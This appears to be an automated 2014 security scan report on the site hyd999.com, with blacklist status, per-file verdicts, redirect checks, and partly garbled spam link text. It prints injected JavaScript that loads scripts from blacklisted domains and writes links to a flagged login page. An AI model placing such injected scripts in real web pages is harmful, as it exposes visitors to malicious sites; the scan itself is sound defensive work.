Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hyd999.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hyd999.com/ | 200 OK Content-Length: 11836 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.lys66.com ...[2188 bytes skipped]... ¥æè±å¼cc_æ¥æè±å¼æ¢å°å_æ¥æè±å¼ä¸ºä»ä¹çä¸äº_sex8bbææ°å°å_æ¥æè±å¼sex8.cc" border="0" /></a></LI> <LI><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62%69%7A/?" targng.com/jyzhaoshang-zrivvramm/">qqç人ç§çåææ°ç</a></li><li><a href="http://www.kuadw.com/kuadw-zrxaacwmva/">æ³°å ´è·¯ç«è½¦ç¥¨</a></li><li><a href="http://www.lys66.com/lys66-zmcaczzcim/">é常å®ç¾ç·å£°ææ²</a></li><li><a href="http://www.0511cm.com/0511cm-zmawrcvmr/">å°å¦ä¸p</a></li><li><a href="http://www.222sis.com/222sis-zmzxxaacc/">qqé£è½¦æ§æå·è½¦</a></li><li><a href="http://www.2bcheap.com/2bcheap-zmwmxwxcm/">å京è±ç£ç§æ¿å°ç»</a></li><li><a href="http://www.3syl.com/3syl-zmqaaxqrix/">ç·å¥³åæ§å ¨è¿ç¨è§é¢"</a>& ...[1851 bytes skipped]... | ||
http://js.njyoukun.com/mobile_464_1154.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://js.njyoukun.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://hyd999.com/static/mulu2/tj.js | 200 OK Content-Length: 406 Content-Type: application/javascript | clean |
http://hyd999.com/gg/top.js | 200 OK Content-Length: 244 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: www.159gps.com document.writeln("<script language=\"javascript\" type=\"text/javascript\" src=\"http://www.159gps.com/gg/zhanqun.js\"></script>");
document.writeln("<script src=\"http://www.vshinantam.com/gg/indexbom.js\" language=\"javascript\"></script>"); | ||
http://hyd999.com/indexbom.js | 200 OK Content-Length: 2981 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.zoudi6.biz function getArrayItems(arr,num){var temp_array=new Array();for(var index in arr){temp_array.push(arr[index])}var return_array=new Array();for(var i=0;i<num;i++){if(temp_array.length>0){var arrIndex=Math.floor(Math.random()*temp_array.length);return_array[i]=temp_array[arrIndex];temp_array.splice(arrIndex,1)}else{break}}return return_array}var array=new Array();array=new Array('http://www.zoudi6.biz\/web\/login.html|ÓûÍû»ùµØ','http://www.zoudi6.biz\/web\/login.html|É«ÀÇÎÑ×ÛºÏ');array=getArrayItems(array,28);document.writeln('<table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc">');document.writeln('<tr>');var split=new Array();for(i=0;i<array.length;i++){if(i%7==0&i>0){document.writeln('</tr>');document.writeln('<tr>')}split=array[i].split('|'); ...[2473 bytes skipped]... Decoded script: <table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc"> <tr> <td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">É«ÀÇÎÑ×ÛºÏ</a></div></td> <td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">ÓûÍû»ùµØ</a></div></td> </table> <SCRIPT> var text=""; day = new Date( ); time = day.getHours( ); ¡¡if (( time>=0) && (time < 6 )) if(parent.win ...[1520 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hyd999.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 08 Aug 2014 18:02:52 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.10-1ubuntu3.9
GET / HTTP/1.1
Host: hyd999.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 08 Aug 2014 18:02:52 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.10-1ubuntu3.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: hyd999.com
Referer: http://www.google.com/search?q=hyd999.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hyd999.com
Referer: http://www.google.com/search?q=hyd999.com
Result:
The result is similar to the first query. There are no suspicious redirects found.